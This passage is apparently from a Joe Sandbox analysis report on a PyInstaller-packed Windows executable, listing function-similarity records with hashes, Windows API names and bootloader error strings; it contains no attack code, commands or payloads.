                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction ID: 91494cfba7f4e63e61bf467b69067d628a989dfdd0d1ab00133d375846eab0a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC028024E0FB0791FA75FF79A8545B4F2A1AF04795BC855BDE81E02260EF3CB5688630
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF79A3188A7,?,?,00000000,00007FF79A313CBB), ref: 00007FF79A31821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction ID: 0595ed2eb929890cbe8ae08134201a7ca7fa476e6322efb337edb24ced814a44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F518111E1FA4281FB71FB31E8512BAF250EF94784FC8497DEA0E826D5EE2CE4058764
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: 13ef7a764b34b3ef9999af5a9d635282f5e369fb83412a475949f4e179058214
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26510626608BA186E6349F32A4181BAF7A1F798B65F404139EBDE43694DF3CD045CB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction ID: 943160455aeb8172fbd34ec377870683d2d11d3614ebec3616e78f1de3fd73d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE218B22F0EA4281F765AF7AA858179F250FF84B90FD8427DEA2D433D4DE2CD5918324
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: b204774df767de4cc455d83b663f4b1b948884128e14486b2bb680a5435abb2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E127F62E0E14386FB74BA25A154679F692FF40750FD4C17DEE9A46AC4DF3CE5808B20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 855a4d690a0ad25160f0d1e234178d31203c7a63648245964dd0b59980ceeac7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B126132E0E14386FF70BA25A25467AF662FB80754FD8407DEF99469C4DB7DE4808B60
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                              • Instruction ID: d9a40c6133c7709e453d0ba19bfdb75d33054329388b94ad67079dad1ffceb43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86418E61B0A65292FA20FB32A8046B9F390BF45BC4FC444BEED0D07796DE3CE5058760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                              • Instruction ID: b0e3666f0701b6b8ee9c2ca97a87f222c2f8db18dccc6f9d51e3304b4f6776b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77415E22B0A64296FA20EF3194415F9F390EF44798FC445BEED4D07B99DE3CE5468724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction ID: f474149996b6a1c347da7fb6d685d38051a96b22233f299b68f64eb1c7eb1aea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0D16B22A097418AFB20EB3594803BDB7A0FB45788FA0417EEE4D57B95DF39E081C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF79A312D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction ID: f874663e905ea0a42771c04dbbe135fa9c96c8189b78b5e59d2757a39e82fc7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D931B422B09B4142F630FB76B8442AAB695BF88798F80013DEF4D97B59DE3CD506C310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDBD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDCB
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE63
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE6F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction ID: 1f0bd83040a55d53c6d5b4b6819bfb02be1bffa582e94192a484a4dc266990fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C316A21B1BA4291FE32EB22A800965B394FF59BE1FD9457DED1D46394EF3CE4448230
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction ID: 46f8135214d4901e76f154056be3ef0838f3a313fe8241fec1de31a919c01be0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61415C61B0EA8691FA31EB71E4552EAB351FB44384FC0417EEA5D43696EF3CE609C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF79A31351A,?,00000000,00007FF79A313F23), ref: 00007FF79A312AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction ID: 366ca9ae1c83fe915555ca5047e42d73b1c72a33ed67f77454b9a75b4c914870
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85217F32A1A78182F670EB61B8817E6B394FB88784F80017EFE8C43659DF7CD6458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                              • Instruction ID: 40b21d87861405551dd29c9adcbdeb250ea76e23b17a8eca0879de3400dcda30
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210C20E0F34642FA787B71AA5917DF2929F447A0F9486BCED3E466D6DE2CB8414320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
